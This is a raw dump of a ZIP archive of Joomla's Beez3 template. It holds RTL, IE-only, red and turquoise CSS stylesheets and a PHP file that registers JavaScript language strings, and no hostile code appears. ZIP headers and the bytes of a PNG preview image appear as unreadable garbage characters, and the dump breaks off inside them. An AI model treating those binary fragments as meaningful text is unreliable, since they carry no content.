	border-right: 1px solid #ccc;
	border-top: 1px solid #ccc;
	margin-left: 3px;
	margin-right: 0px;
}

form fieldset dt
{
	clear:right ;
	float:right;
	width:12em;
	padding:3px 0
}

form fieldset dd
{
	float:right;
	padding:3px 0
}

#users-profile-core dt,
#users-profile-custom dt
{
	float:right;
	width:12em;
	padding:3px 0;


}

.profile-edit form#member-profile fieldset dt,
.registration form#member-registration fieldset dt
{padding:5px 0px 5px 5px; width:13em}


.login-fields label
{float:right}

/* ++++++++++++++  pagination  ++++++++++++++ */

#main .pagination
{
	float:right;
	text-align:right;
	padding:10px 10px 0px 0px;
	width: 100%;
	clear:both;
}

#main .pagination ul
{
	float:right;
	text-align:right;

}

#main .pagination li
{
	float:right;
	text-align:right;
}

#main .pagination li.pagination-start span,
#main .pagination li.pagination-start a
{
padding:4px 0;
}

.left1 {
	float: right;
	margin: 10px 10px 3% 10px ;
}


/* ++++++++++++++  login  ++++++++++++++ */



#login-form label
{
	margin-right:0px;
}

#form-login-remember label
{
	float:none;
	width:auto;
	display:inline
}

input.button,
button.button,
button.validate
{
	padding:3px 7px 5px 7px;
}

#modlgn-username,
#modlgn-passwd
{
	margin-right: 0;
}

.module_content #form-login-username label,
.module_content #form-login-password label
{
	float:right;

}

.login-fields
{
	margin:10px 0
}

.login-fields label
{
	float:right;
}

.login-description img,
.logout-description img
{
	float:right;
	margin-right:0px
}

.login-description,
.logout-description
{
	padding-right:5px;
	margin:20px 10px 0 0;
}

/* ++++++++++++++  columns alignment left to right  ++++++++++++++ */
ul.tabs li {
	float: right;
	border-left: 1px solid #DDDDDD;
	border-right: 0px solid #DDDDDD;
}


ul.pagenav li.pagenav-next {
	float: left;
}
ul.pagenav li.pagenav-prev {
	float: right;
}
#close span {
	width: auto;
	left: 20px;
	right: auto;
}
#header ul.menu li a:link,
#header ul.menu li a:visited
{
	border-right:solid 0px #237D85;
	border-left:solid 1px #237D85;
}

#header ul li.active a:link,
#header ul li.active a:visited
{
	border-right:solid 0px #237D85;
	border-left:solid 1px #237D85;
}
#fontsize {
	margin: 0 1px 0 20px;
	text-align: right;
}
#fontsize p a:link, #fontsize p a:visited {
	border-left: 1px solid #CCCCCC;
	border-right: none;
}
#header form .inputbox {
	margin: 2px 2px 2px 13px;
}
#header form .inputbox:focus { margin: 1px 1px 0 11px; }
#header ul.menu li {
	float: right;
}

/* ############## Blog/featured columns ######## */

.blog-featured .item, .blog .item {
	float:right;
}
.items-row .column-1 {
	margin-right: 0;
	margin-left: 4%;
}

#main ul.actions {
	text-align: left;
}

.content_rating {
	text-align: right;

}

ul.menu li ul li ul li ul li ul {
	padding-right: 7px;
}

#system-message dd.notice ul,
#system-message dd.error ul,
#system-message dd.message  ul {
        background-position: 100% 0!important;
        padding: 10px 40px 10px 10px!important;
}
#system-message dd.message  ul {
        background-image:url(../images/system/notice-info_rtl.png)!important;
}
#system-message dd.notice ul {
        background-image:url("../images/system/notice-note_rtl.png")!important;
}
#system-message dd.error ul {
        background-image:url(../images/system/notice-alert_rtl.png)!important;
}

/* ++++++++++++++  image float style ++++++++++++++ */
.img-fulltext-left {
	float: right;
	margin-left: 20px;
	margin-bottom: 20px;
}

.img-intro-left {
	float: right;
	margin-left: 10px;
	margin-bottom: 10px;
}

.img-fulltext-right {
	float:left;
	margin-right: 20px;
	margin-bottom: 20px;
}

.img-intro-right {
	float: left;
	margin-right: 10px;
	margin-bottom: 10px;
}

/* ++++++ Bootstrap markup ++++++++++++++ */
.pull-left {
	float: right;
}

/* ++++++ tooltip  +++++++ */
.tooltip.right {
	margin-left: -3px;
}
.tooltip.left {
	margin-left: 3px;
}
.popover,
.tooltip-inner {
	text-align: right;
}
.tooltip.top .tooltip-arrow {
	bottom: 0;
	right: 50%;
	margin-right: -5px;
}
.tooltip.right .tooltip-arrow {
	left: 0;
	border-width: 5px 0 5px 5px;
}
.tooltip.left .tooltip-arrow {
	right: 0;
	border-width: 5px 5px 5px 0;
}
.tooltip.bottom .tooltip-arrow {
	right: 50%;
	margin-right: -5px;
}

/* Smartsearch Calendar*/
#filter_date1_img,
#filter_date2_img {
	margin-left: 0;
	margin-right: 3px;
}
ul#finder-filter-select-dates li.filter-date {
	text-align: right;
}
.radio, .checkbox {
	padding-left: 0;
	padding-right: 4px;
}
#searchForm .searchintro {
	padding: 0 250px 0 0;
}PK!���3	3	beez3/css/ieonly.cssnu&1i�/**

 * @author ( Angie Radtke )
 * @package Joomla
 * @subpackage Accessible-Template-Beez
 * @copyright Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
 * @license GNU/GPL, see LICENSE.txt
 * Joomla! is free software. This version may have been modified pursuant to the
 * GNU General Public License, and as distributed it includes or is derivative
 * of works licensed under the GNU General Public License or other free or open
 * source software licenses. See COPYRIGHT.php for copyright notices and
 * details.
 */



#all { width: expression(document . body . clientWidth > 1050 ? "1050" : "auto");  }
#footer-inner { width: expression(document . body . clientWidth > 1050 ? "1025" : "auto");  }
#footer { width: expression(document . body . clientWidth > 1050 ? "1020" : "auto");  }

#all
{
        border:solid 1px #fff;
                zoom:1
}

#header
{ position:relative; zoom:1}


#line
{
        width:19.0em;
        margin-right:20px;

}


#header ul.skiplinks li a
{

background:#cc0000;
border:0px solid #000

}


#contentarea,
#contentarea2
{
       display:inline-block;
        position:relative;
}

#main
{
            height:520px;
}

#back
{
        margin: 0;
        padding:0 0px;
}

#right
{
        float:left;
        width: 20.5%;
        text-align:left !important
}

.left
{
            margin:10px 0px 10px 18px;

}

/* haslayout erzwingen */

.blog
{
            width:100%
}

.article_row
{
        width:auto;
}

.row1 .cols2
{
        width:auto;
}

.moduletable,
.moduletable_js
{
            zoom:1
}

#nav ul li,
#right ul li,
#bottom ul li
{
            height:1%
}

p.articleinfo
{
            display:inline-block
}

h1
{

}

ul.tabs
{
        text-align:left
}

ul.newsflash-horiz,
#footer-outer,
ul.tabs
{
        zoom:1
}

.tabcontent
{
        overflow:hidden !important;
        position:relative
}

#main h1
{ zoom:1}

.box {width:26%}

#bottom
{display:inline-block}

.panel,
div.current
{zoom:1}

.contact-image
{
	display:inline-block
}
.item-page
{ width:100%}

#mailto-window  .mailto-close a
{

	width:25px;
	height:25px;



}

#users-profile-core legend,
#users-profile-custom legend,
.profile-edit legend,
.registration legend
{
	margin-bottom:15px
}


.login-fields input
{
	width:14em
}

dd.error
{zoom:1}

#close a
{
	cursor:pointer
}

#close a span
{
	line-height:normal
}
PK!�E��"�"beez3/css/red.cssnu&1i�/* This beautiful CSS-File has been crafted with LESS (lesscss.org) and compiled by simpLESS (wearekiss.com/simpless) */
body {
	background: #eee
}

h3 {
	color: #555
}

h2 a {
	text-decoration: none
}

h2, .moduletable h3, .items-leading h2 {
	border-bottom: solid 1px #ddd
}

.items-row h2 {
	border-top: solid 1px #ddd;
	border-bottom: solid 1px #ddd
}

a:link, a:visited {
	color: #c00
}

a:hover, a:active, a:focus {
	background: #c00;
	color: #FFF
}

.logoheader {
	background: #900;
	color: #FFF;
	min-height: 200px
}

#all {
	background: #fff;
	color: #555
}

#shadow #all {
	box-shadow: 0 20px 10px #555
}

#header ul.menu {
	background-color: #ddd;
	background-repeat: repeat-x;
	filter: progid:dximagetransform.microsoft.gradient(startColorstr=#eeeeee, endColorstr=#dddddd);
	background-image: -khtml-gradient(linear, left top, left bottom, from(#eee), to(#ddd));
	background-image: -moz-linear-gradient(top, #eee, #ddd);
	background-image: -ms-linear-gradient(top, #eee, #ddd);
	background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #eee), color-stop(100%, #ddd));
	background-image: -webkit-linear-gradient(top, #eee, #ddd);
	background-image: -o-linear-gradient(top, #eee, #ddd);
	background-image: linear-gradient(#eee, #ddd);
	border-color: #b2b2b2 #b2b2b2 #9f9f9f;
	text-shadow: 0 1px 1px rgba(255, 255, 255, .49);
	-webkit-font-smoothing: antialiased;
	box-shadow: 0 1px 0 rgba(255, 255, 255, .2) inset, 0 1px 2px rgba(0, 0, 0, .05);
	border: solid 1px #ddd;
	border: 1px solid #e5e5e5;
	text-transform: uppercase
}

#header ul.menu a:link, #header ul.menu a:visited {
	color: #333;
	display: inline-block;
	font-weight: 700;
	text-decoration: none;
	padding: 0 10px;
	margin: 0;
	display: inline-block;
	margin: 0 0 0;
	padding: 12px 15px;
	position: relative;
	border-right: 1px solid #ddd;
	box-shadow: 1px 0 0 #f5f5f5
}

.button, button, p.readmore a, #header input.button, .pagenav a:link, .pagenav a:visited, #advanced-search-toggle, .profile-edit a:link, .profile-edit a:visited, h3.js_heading, .article-info {
	background-color: #ddd;
	background-repeat: repeat-x;
	filter: progid:dximagetransform.microsoft.gradient(startColorstr=#ffffff, endColorstr=#dddddd);
	background-image: -khtml-gradient(linear, left top, left bottom, from(#fff), to(#ddd));
	background-image: -moz-linear-gradient(top, #fff, #ddd);
	background-image: -ms-linear-gradient(top, #fff, #ddd);
	background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #fff), color-stop(100%, #ddd));
	background-image: -webkit-linear-gradient(top, #fff, #ddd);
	background-image: -o-linear-gradient(top, #fff, #ddd);
	background-image: linear-gradient(#fff, #ddd);
	border-color: #b2b2b2 #b2b2b2 #9f9f9f;
	text-shadow: 0 1px 1px rgba(255, 255, 255, .49);
	-webkit-font-smoothing: antialiased;
	box-shadow: 0 1px 0 rgba(255, 255, 255, .2) inset, 0 1px 2px rgba(0, 0, 0, .05);
	color: #c00;
	border: solid 1px #ddd
}

.article-info {
	color: #555
}

table {
	border: solid 1px #ddd
}

table th a:link, table th a:visited {
	color: #fff
}

tr.odd, tr.cat-list-row1 {
	background: #f8f8f8
}

table tr:hover td {
	background: #FEFDE2
}

.button:hover, .button:active, .button:focus, button:hover, p.readmore a:hover, #header ul.menu a:hover, #header ul.menu a:active, #header ul.menu a:focus, .pagenav a:hover, .pagenav a:active, .pagenav a:focus, #advanced-search-toggle:hover, #advanced-search-toggle:active, #advanced-search-toggle:focus, .profile-edit a:hover, .profile-edit a:active, .profile-edit a:focus, #fontsize a:hover, #fontsize a:active, #fontsize a:focus, #mobile_select h2 a, table th, .logoheader {
	background-color: #c00;
	background-repeat: repeat-x;
	filter: progid:dximagetransform.microsoft.gradient(startColorstr=#cc0000, endColorstr=#990000);
	background-image: -khtml-gradient(linear, left top, left bottom, from(#c00), to(#900));
	background-image: -moz-linear-gradient(top, #c00, #900);
	background-image: -ms-linear-gradient(top, #c00, #900);
	background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #c00), color-stop(100%, #900));
	background-image: -webkit-linear-gradient(top, #c00, #900);
	background-image: -o-linear-gradient(top, #c00, #900);
	background-image: linear-gradient(#c00, #900);
	border-color: #900;
	color: #fff;
	text-shadow: 0 -1px 0 rgba(0, 0, 0, .33);
	-webkit-font-smoothing: antialiased
}

.pagination span, .pagination span a:hover {
	color: #999;
	background-color: #f5f5f5
}

span.pagenav {
	background: #095197;
	color: #fff
}

.pagination-start span.pagenav, .pagination-prev span.pagenav, .pagination-end span.pagenav, .pagination-next span.pagenav {
	background-color: #f5f5f5;
	color: #444
}

ul.menu a:link, ul.menu a:visited {
	color: #444
}

.moduletable_menu {
	border: solid 1px #ddd;
	background: #f9f9f9
}

#header ul.menu {
	border: solid 1px #D5D5D5;
	box-shadow: 0 1px 0 #fff inset, 0 1px 5px rgba(0, 0, 0, .1)
}

#header ul.menu a {
	box-shadow: none;
	border-bottom: 0
}

ul.menu a:hover, ul.menu a:active, ul.menu a:focus {
	background-color: #F5F5F5;
	background-image: -moz-linear-gradient(center top, #fff, #e6e6e6);
	background-repeat: repeat-x;
	background: url(../images/arrow.png) no-repeat right center;
	color: #c00
}

ul.menu li.active a, ul.menu li.active ul li.active a, ul.menu li.active ul li.active ul li.active a, ul.menu li.active ul li.active ul li.active ul li.active a, ul.menu li.active ul li.active ul li.active ul li.active ul li.active a {
	font-weight: 700
}

ul.menu li.active ul li a, ul.menu li.active ul li.active ul li a, ul.menu li.active ul li.active ul li.active ul li a, ul.menu li.active ul li.active ul li.active ul li.active ul li a {
	font-weight: 400
}

ul.menu a {
	box-shadow: 0 1px 0 #fff;
	border-bottom: solid 1px #ddd;
	text-shadow: 0 1px 0 #fff
}

ul.menu ul a {
	background: #e5e5e5;
	margin-bottom: 1px
}

ul.menu ul ul ul a {
	background: #f5f5f5 url(../images/arrow.png) no-repeat 24px center
}

ul.menu ul ul ul ul a {
	background: #fff
}

.panel h3.pane-toggler a {
	background: url(../images/slider_plus.png) right top no-repeat;
	color: #333
}

.panel h3.pane-toggler-down a {
	background: url(../images/slider_minus.png) right top no-repeat;
	border-bottom: solid 1px #ddd;
	color: #333
}

ul.tabs li, dl.tabs dt h3 a:link, dl.tabs dt h3 a:visited {
	background: #f5f5f5 url(../images/nature/box.png) repeat-x
}

ul.tabs li a:link, ul.tabs li a:visited, dl.tabs dt a {
	color: #333;
	border: solid 1px #ddd;
	border-bottom: 0
}

ul.tabs li a:hover, ul.tabs li a:active, ul.tabs li a:focus {
	color: #000
}

.tabcontent, div.current {
	background: #fff;
	color: #000;
	border: solid 1px #ddd
}

.tabcontent .linkclosed {
	color: #000;
	border-bottom: solid 1px #e5e5e5
}

ul.tabs li a.linkopen, dl.tabs dt.open h3 a:link, dl.tabs dt.open h3 a:visited {
	background: #fff;
	color: #333;
	border-radius: 5px 5px 0 0
}

ul.tabs li a.linkclosed:hover, ul.tabs li a.linkclosed:active, ul.tabs li a.linkclosed:focus, ul.tabs li a.linkopen:hover, ul.tabs li a.linkopen:active, ul.tabs li a.linkopen:focus {
	background: #555;
	color: #fff
}

#footer-inner, #footer {
	background: #f5f5f5;
	box-shadow: 0 20px 10px #555
}

#footer {
	background: #555;
	max-width: 1025px;
	margin: 0 auto;
	box-shadow: 0 0 10px #555;
	color: #fff
}

#footer a {
	color: #fff;
	background: 0
}

#bottom a {
	background: 0
}

.box1 {
	border-right: solid 1px #ccc
}

.box3 {
	border-left: solid 1px #ccc
}

#bottom ul li a {
	background-image: none;
	padding-left: 0
}

#mobile_select h2 {
	border: 0;
	margin: -17px 0 0 0;
	padding: 0;
	background: #900;
	text-align: right
}

#mobile_select h2 a {
	display: inline-block;
	font-size: .8em;
	border-radius: 4px 4px 0 0;
	padding: 6px;
	font-size: .75em;
	margin-right: 5px
}

@media only screen and (max-width: 480px) {
	img {
		max-width: 100%;
		height: auto;
		border: 0;
		-ms-interpolation-mode: bicubic
	}

	#fontsize {
		display: none
	}

	#nav, #wrapper2, #wrapper, .cols-3 .column-1, .cols-3 .column-2, .cols-3 .column-3, #right, .box, #header form {
		float: none;
		width: 100%
	}

	#header {
		padding-top: 3em
	}

	#header form {
		margin: 0
	}

	.logoheader {
		background: #900;
		min-height: 100px;
		margin: 0
	}

	.box {
		border-left: 0 !important;
		border-bottom: solid 1px #ddd
	}

	#line {
		text-align: center;
		top: 0;
		right: auto;
		max-width: 100%;
		min-width: 100%;
		margin: 0 0;
		background: #c00
	}

	#header form input {
		float: none;
		margin-bottom: 4px
	}

	#menuwrapper {
		margin-top: 10px
	}

	#header ul.menu {
		position: relative;
		top: 0;
		left: 20px;
		right: 20px;
		margin: 0;
		width: 90%;
		border-radius: 4px
	}

	#header ul.menu li:first-child a {
		border-radius: 4px 4px 0 0
	}

	#header ul.menu li:last-child a {
		border-radius: 0 0 4px 4px
	}

	#header ul.menu li a:link, #header ul.menu li a:visited {
		display: block;
		padding: 6px 10px;
		border-bottom: solid 1px #ccc
	}
}
PK!�˴�;#;#beez3/css/turq.cssnu&1i�body {
	background: #eeeeee;
}
h3 {
	color: #555;
}
h2 a {
	text-decoration: none;
}
h2,
.moduletable h3,
.items-leading h2 {
	border-bottom: solid 1px #ddd;
}
.items-row h2 {
	border-top: solid 1px #ddd;
	border-bottom: solid 1px #ddd;
}
a:link,
a:visited {
	color: #009999;
}
a:hover,
a:active,
a:focus {
	background: #009999;
	color: #FFF;
}
.logoheader {
	background: #009999;
	color: #FFFFFF;
	min-height: 200px;
}
#all {
	background: #fff;
	color: #555;
}
#shadow #all {
	box-shadow: 0px 20px 10px #555555;
}
#header ul.menu {
	background-color: #ddd;
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#eee,endColorstr=#ddd);
	background-image: -khtml-gradient(linear,left top,left bottom,from(#eee),to(#ddd));
	background-image: -moz-linear-gradient(top,#eee,#ddd);
	background-image: -ms-linear-gradient(top,#eee,#ddd);
	background-image: -webkit-gradient(linear,left top,left bottom,color-stop(0%,#eee),color-stop(100%,#ddd));
	background-image: -webkit-linear-gradient(top,#eee,#ddd);
	background-image: -o-linear-gradient(top,#eee,#ddd);
	background-image: linear-gradient(#eee,#ddd);
	border-color: #b2b2b2 #b2b2b2 #9f9f9f;
	text-shadow: 0 1px 1px rgba(255,255,255,0.49);
	-webkit-font-smoothing: antialiased;
	box-shadow: 0 1px 0 rgba(255,255,255,0.2) inset, 0 1px 2px rgba(0,0,0,0.05);
	border: solid 1px #ddd;
	border: 1px solid #e5e5e5;
	text-transform: uppercase;
}
#header ul.menu a:link,
#header ul.menu a:visited {
	color: #333;
	font-weight: bold;
	text-decoration: none;
	padding: 0px 10px;
	margin: 0;
	display: inline-block;
	margin: 0 0 0;
	padding: 12px 15px;
	position: relative;
	border-right: 1px solid #ddd;
	box-shadow: 1px 0px 0px #f5f5f5;
}
.button,
button,
p.readmore a,
#header input.button,
.pagenav a:link,
.pagenav a:visited,
#advanced-search-toggle,
.profile-edit a:link,
.profile-edit a:visited,
h3.js_heading,
.article-info {
	background-color: #ddd;
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#ffffff,endColorstr=#dddddd);
	background-image: -khtml-gradient(linear,left top,left bottom,from(#ffffff),to(#dddddd));
	background-image: -moz-linear-gradient(top,#ffffff,#dddddd);
	background-image: -ms-linear-gradient(top,#ffffff,#dddddd);
	background-image: -webkit-gradient(linear,left top,left bottom,color-stop(0%,#ffffff),color-stop(100%,#dddddd));
	background-image: -webkit-linear-gradient(top,#ffffff,#dddddd);
	background-image: -o-linear-gradient(top,#ffffff,#dddddd);
	background-image: linear-gradient(#ffffff,#dddddd);
	border-color: #b2b2b2 #b2b2b2 #9f9f9f;
	text-shadow: 0 1px 1px rgba(255,255,255,0.49);
	-webkit-font-smoothing: antialiased;
	box-shadow: 0 1px 0 rgba(255,255,255,0.2) inset, 0 1px 2px rgba(0,0,0,0.05);
	color: #009999;
	border: solid 1px #ddd;
}
.article-info {
	color: #555;
}
table {
	border: solid 1px #ddd;
}
table th a:link,
table th a:visited {
	color: #fff;
}
tr.odd,
tr.cat-list-row1 {
	background: #f8f8f8;
}
table  tr:hover td {
	background: #FEFDE2;
}
.button:hover,
.button:active,
.button:focus,
button:hover,
p.readmore a:hover,
#header ul.menu a:hover,
#header ul.menu a:active,
#header ul.menu a:focus,
.pagenav a:hover,
.pagenav a:active,
.pagenav a:focus,
#advanced-search-toggle:hover,
#advanced-search-toggle:active,
#advanced-search-toggle:focus,
.profile-edit a:hover,
.profile-edit a:active,
.profile-edit a:focus,
#fontsize a:hover,
#fontsize a:active,
#fontsize a:focus,
#mobile_select h2 a,
table th,
.logoheader {
	background-color: #00B9B9;
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#00B9B9,endColorstr=#009999);
	background-image: -khtml-gradient(linear,left top,left bottom,from(#00B9B9),to(#009999));
	background-image: -moz-linear-gradient(top,#00B9B9,#009999);
	background-image: -ms-linear-gradient(top,#00B9B9,#009999);
	background-image: -webkit-gradient(linear,left top,left bottom,color-stop(0%,#00B9B9),color-stop(100%,#009999));
	background-image: -webkit-linear-gradient(top,#00B9B9,#009999);
	background-image: -o-linear-gradient(top,#00B9B9,#009999);
	background-image: linear-gradient(#00B9B9,#009999);
	border-color: #009999;
	color: #fff;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.33);
	-webkit-font-smoothing: antialiased;
}
input:focus,
textarea:focus {
	box-shadow: 0 1px 1px #ddd inset, 0 0 8px #00B9B9;
	outline: 0 none;
}
.pagination span,
.pagination span  a:hover {
	color: #999999;
	background-color: #f5f5f5;
}
span.pagenav {
	background: #009999;
	color: #fff;
}
.pagination-start span.pagenav,
.pagination-prev  span.pagenav,
.pagination-end span.pagenav,
.pagination-next span.pagenav {
	background-color: #f5f5f5;
	color: #444;
}
ul.menu a:link,
ul.menu a:visited {
	color: #444;
}
.moduletable_menu {
	border: solid 1px #ddd;
	background: #f9f9f9;
}
#header ul.menu {
	border: solid 1px #D5D5D5;
	box-shadow: 0 1px 0 #FFFFFF inset, 0 1px 5px rgba(0,0,0,0.1);
}
#header ul.menu a {
	box-shadow: none;
	border-bottom: 0;
}
ul.menu a:hover,
ul.menu a:active,
ul.menu a:focus {
	background-color: #F5F5F5;
	background-image: -moz-linear-gradient(center top,#FFFFFF,#E6E6E6);
	background-repeat: repeat-x;
	background: url(../images/arrow.png) no-repeat right center;
	color: #009999;
}
ul.menu li.active a,
ul.menu  li.active ul li.active a,
ul.menu  li.active ul li.active  ul li.active a,
ul.menu  li.active ul li.active  ul li.active ul li.active  a,
ul.menu  li.active ul li.active  ul li.active ul li.active ul li.active a {
	font-weight: bold;
}
ul.menu  li.active ul li a,
ul.menu  li.active ul li.active  ul li a,
ul.menu  li.active ul li.active  ul li.active ul li  a,
ul.menu  li.active ul li.active  ul li.active ul li.active ul li a {
	font-weight: normal;
}
ul.menu a {
	box-shadow: 0 1px 0 #fff;
	border-bottom: solid 1px #ddd;
	text-shadow: 0 1px 0 #fff;
}
ul.menu ul a {
	background: #e5e5e5;
	margin-bottom: 1px;
}
ul.menu ul ul ul a {
	background: #f5f5f5 url(../images/arrow.png) no-repeat 24px center;
}
ul.menu ul ul ul ul a {
	background: #fff;
}
.panel h3.pane-toggler a {
	background: url(../images/slider_plus.png) right top no-repeat;
	color: #333;
}
.panel h3.pane-toggler-down a {
	background: url(../images/slider_minus.png) right top no-repeat;
	border-bottom: solid 1px #ddd;
	color: #333;
}
ul.tabs li,
dl.tabs dt h3 a:link,
dl.tabs dt h3 a:visited {
	background: #f5f5f5 url(../images/nature/box.png) repeat-x;
}
ul.tabs li a:link,
ul.tabs li a:visited,
dl.tabs dt a {
	color: #333;
	border: solid 1px #ddd;
	border-bottom: 0;
}
ul.tabs li a:hover,
ul.tabs li a:active,
ul.tabs li a:focus {
	color: #000;
}
.tabcontent,
div.current {
	background: #fff;
	color: #000;
	border: solid 1px #ddd;
}
.tabcontent .linkclosed {
	color: #000;
	border-bottom: solid 1px #e5e5e5;
}
ul.tabs li a.linkopen,
dl.tabs dt.open  h3 a:link,
dl.tabs dt.open  h3 a:visited {
	background: #fff;
	color: #333;
	border-radius: 5px 5px 0px 0px;
}
ul.tabs li a.linkclosed:hover,
ul.tabs li a.linkclosed:active,
ul.tabs li a.linkclosed:focus,
ul.tabs li a.linkopen:hover,
ul.tabs li a.linkopen:active,
ul.tabs li a.linkopen:focus {
	background: #555;
	color: #fff;
}
#footer-inner,
#footer {
	background: #f5f5f5;
	box-shadow: 0px 20px 10px #555;
}
#footer {
	background: #555;
	max-width: 1025px;
	margin: 0 auto;
	box-shadow: 0px 0px 10px #555555;
	color: #fff;
}
#footer a {
	color: #fff;
	background: none;
}
#bottom a {
	background: none;
}
.box1 {
	border-right: solid 1px #ccc;
}
.box3 {
	border-left: solid 1px #ccc;
}
#bottom  ul li a {
	background-image: none;
	padding-left: 0;
}
#mobile_select h2 {
	border: 0;
	margin: -17px 0 0 0;
	padding: 0;
	background: #009999;
	text-align: right;
}
#mobile_select h2 a {
	display: inline-block;
	font-size: 0.8em;
	border-radius: 4px 4px 0 0;
	padding: 6px;
	font-size: 0.75em;
	margin-right: 5px;
}
@media only screen and (max-width: 480px) {
	img {
		max-width: 100%;
		height: auto;
		border: 0;
		-ms-interpolation-mode: bicubic;
	}
	#fontsize {
		display: none;
	}
	#nav,
	#wrapper2,
	#wrapper,
	.cols-3 .column-1,
	.cols-3 .column-2,
	.cols-3 .column-3,
	#right,
	.box,
	#header form {
		float: none;
		width: 100%;
	}
	#header {
		padding-top: 3em;
	}
	#header form {
		margin: 0;
	}
	.logoheader {
		background: #009999;
		min-height: 100px;
		margin: 0;
	}
	.box {
		border-left: 0 !important;
		border-bottom: solid 1px #ddd;
	}
	#line {
		text-align: center;
		top: 0;
		right: auto;
		max-width: 100%;
		min-width: 100%;
		margin: 0 0px;
		background: #00B9B9;
	}
	#header form input {
		float: none;
		margin-bottom: 4px;
	}
	#menuwrapper {
		margin-top: 10px;
	}
	#header ul.menu {
		position: relative;
		top: 0;
		left: 20px;
		right: 20px;
		margin: 0;
		width: 90%;
		border-radius: 4px;
	}
	#header ul.menu li:first-child a {
		border-radius: 4px 4px 0 0;
	}
	#header ul.menu li:last-child a {
		border-radius: 0 0 4px 4px;
	}
	#header ul.menu li a:link,
	#header ul.menu li a:visited {
		display: block;
		padding: 6px 10px;
		border-bottom: solid 1px #ccc;
	}
}
PK!Duj���beez3/jsstrings.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

// No direct access.
defined('_JEXEC') or die;

JText::script('TPL_BEEZ3_ALTOPEN');
JText::script('TPL_BEEZ3_ALTCLOSE');
JText::script('TPL_BEEZ3_TEXTRIGHTOPEN');
JText::script('TPL_BEEZ3_TEXTRIGHTCLOSE');
JText::script('TPL_BEEZ3_FONTSIZE');
JText::script('TPL_BEEZ3_BIGGER');
JText::script('TPL_BEEZ3_RESET');
JText::script('TPL_BEEZ3_SMALLER');
JText::script('TPL_BEEZ3_INCREASE_SIZE');
JText::script('TPL_BEEZ3_REVERT_STYLES_TO_DEFAULT');
JText::script('TPL_BEEZ3_DECREASE_SIZE');
JText::script('TPL_BEEZ3_OPENMENU');
JText::script('TPL_BEEZ3_CLOSEMENU');

$this->addScriptDeclaration("
	var big        = '" . (int) $this->params->get('wrapperLarge') . "%';
	var small      = '" . (int) $this->params->get('wrapperSmall') . "%';
	var bildauf    = '" . $this->baseurl . '/templates/' . $this->template . "/images/plus.png';
	var bildzu     = '" . $this->baseurl . '/templates/' . $this->template . "/images/minus.png';
	var rightopen  = '" . JText::_('TPL_BEEZ3_TEXTRIGHTOPEN', true) . "';
	var rightclose = '" . JText::_('TPL_BEEZ3_TEXTRIGHTCLOSE', true) . "';
	var altopen    = '" . JText::_('TPL_BEEZ3_ALTOPEN', true) . "';
	var altclose   = '" . JText::_('TPL_BEEZ3_ALTCLOSE', true) . "';
");
PK!V�
c��beez3/template_preview.pngnu&1i��PNG


IHDR��)����IDATx��uX����D���w����ݝ���Zo��֠�����	�<$Xp�'���w����Ux^8�?F�g�o�(�X,�B��q�������P!�Bc�$PEB!4�(��B�9A!�И�m�!��e�H#�BF��b��C��D"�1cq��8q�F!��GH�R��rB �L&��1w�����(244!�Ш����4]__�g0�
�0����~� �B��(J,t:"�H(�l擗�8`��8c��J�������Yo klm��tEm�L�*�oi�^]�@
��]UݑʿxQ����h���A��;���F��N�C�
` �t`�{#��eY�B�G��������(��5'����.r*��j4�(�GU��_�[��-o^�_���mf��#���i�]�
�'~�-V �Qׯl2�X�Ю��XM[�R�ց�Z��
�6��g����W�^U���k׮Y�;���
�1>��$ӓ)�m6��&�477B���O��?c�O�$*J���(��3�M���Coy.�ԛ�G��∨��A��X��yJRfv�	ea/
iQ��v��"F�F�	#��+��Y�g�?�\)������W���v�T�j}d��튼��2�s���0���q�m,��H�*��<�'/��j��PU��@d��^�n|i��h/*�eU��.�o����g*k+�ͦ����N;4շ�,I�3�Q��X��3�b`���pxE;<MekTN���?���
#r~*"�e��s�B�[�_����&�ٞ����m���%%%��_����A�i3!����Aq}@�r#S�����zM� ���.":�K:}�W�#'�Tɂ�
����h:���>�}��Pؖ�'(�b7���iJ��E��_�;O��V�_�^���i�W���gu�x����=����v��UIu��D�G��ʪ����^�>eGu�f�o��'�O�U�
u�����̹��d�S�8aNzY�ΐ_]��=������#�F�<�'����C�qfޥ�<w��d��~�'�r�;������J��7����z"Nt̞��Y��Λ*���\��]�"`���j[�?��V�@����*�0��̻��o�TY�{EX���w?��#�W}dM������'�曯_y>��0�g�e�u]i?��|�ɇ_�׶��}Tw�����r��$뀵Z-���
�������ܮs�@�^����h`hR\T@R
�)�`X�J�}L6���Q�w��Fol,��{�\��]60W��U	���V�d6¯��}��������!������U��
_�.����e{�=��:�A�*�代ʧ���f�������%������w�2�r��E���ຟ�:fgZ���b7�T5��)�K�n�0�љwo�HQ>��R㎄p��am�:���GW���f�vth^���zﴌ����hJ��d��S��l����=�R��~j�<*���}J�z̓������P�?�yt�#c!dIL�w�YcJ�Z�ƀ�����ү�S6<O� �T��:!d�1���7G����)�=.O��K�S�
'|�/C�B�T*kkkE�B٬�3.:�L2����K��`# �\\ń�n��_�m�~<��@:���]%���nRwk[tб�����yR�k��h��o�}��!�f2�3�,����d�8v�1]�٬�o6`��Lq3ٺ8"�7�sn%�H@-�����n���t=��]���)M;��}��3�K(��[o�`�Bׅ��o��'�|Gį�wu�'�f�}�V�����KL��Ro��}��OΙ+8��h�/Z-dp����F�Қ�UI�槮���k��6;K����I$�TL-�;��<Κ�*�B��1����]���z�v飗,<��yY'!�����)����|	G]v�-I�ӳ���Ϫ�5{�/���(p���;��ީ��K���~�5����/ �]z2	��,
Y�%j��B)�B��k�G:m���۷oګl�jȉ�����Il��x�Y���ͥ�>>��aI������)1{�$$�H@hbkn,��Ll�6����?�w�;I��ܡ�@T���PT�.F���cG8�\Z���/c� >�"8�Rc�,-�G
